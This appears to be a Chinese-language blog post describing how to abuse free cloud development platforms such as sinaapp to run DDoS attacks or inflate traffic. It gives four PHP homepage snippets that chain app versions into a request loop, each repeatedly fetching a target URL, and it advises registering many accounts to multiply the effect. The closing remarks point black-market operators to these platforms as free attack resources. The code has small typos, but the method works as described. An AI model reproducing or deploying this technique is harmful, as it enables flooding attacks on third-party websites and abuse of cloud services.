***可利用雲開發平臺進行DDOS***

說是DDOS***,實際上還可以用來刷流量和排名。估計這個想法很多大牛之前已經有想過,昨天在使用sinaapp時測試了下,貌似可行,所以和大家分享下。 大牛小牛應該都知道sinaapp、百度site app等都爲開發者提供了很好的開放平臺,註冊也很簡單。每個用戶可以創建不同版本的app應用,***者可以利用該特點,註冊大量用戶,編寫PHP代碼對目標發起***,在測試過程中,我使用了一個帳號,創建了4個版本的APP進行測試,在自己站點上寫了個記錄訪問者ip的文件作爲被***者,效果不錯,該記錄文件每秒的容量暴漲(說明app訪問被***者網站的頻率很高)。下面看下測試步驟: PS:主要使用sinaapp作爲測試對象。 測試思路:創建4個版本的app. 版本1 主頁代碼如下:
<?php
file_get_contents('http://2.mars.sinaapp.com/');//版本1觸發***(訪問版本2)
?>版本2 主頁代碼:
<?php
file_get_contents('http://www.xxx.com/ip.php')://***目標
file_get_contents('http://3.mars.sinaapp.com/');//訪問版本3
?>版本3 主頁代碼:
<?php
for ($i=1; $<=10; $i++){//這裏邪惡了一下,多來幾次效果更佳
file_get_contents('http://www.xxx.com/ip.php');
file_get_contents('http://4.mars.sinaapp.com/'); }
?>版本4 主頁代碼:
<?php
file_get_contents('http://2.mars.sinaapp.com/');//訪問版本2,導致死循環
?> 以上是使用一個sinaapp用戶進行***的步驟,可以自己擴展,註冊大量用戶及創建更多的版本進行***。但在測試過程中發現,每個APP實際上有兩個IP出口。使用多個用戶效果會更好。 PS:大家應該會有個疑問,爲什麼要創建版本4,這個我也是在實驗中發現的,如果使用版本2和版本3直接互調,則達不到***的效果,版本2和版本3只訪問被***目標一次舊停止了。有哪位大牛知道爲什麼的還請不惜賜教。 PS2:該文章本來在烏雲發了,但感覺這應該不算是漏洞,是雲計算產生的一個必然結果,所以在這發表下,分享下自己的思路,望大夥多提提意見。很多搞黑產的都在羣裏購買什麼php doos資源,雲開發平臺已經爲你們準備了大量的免費資源了!
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章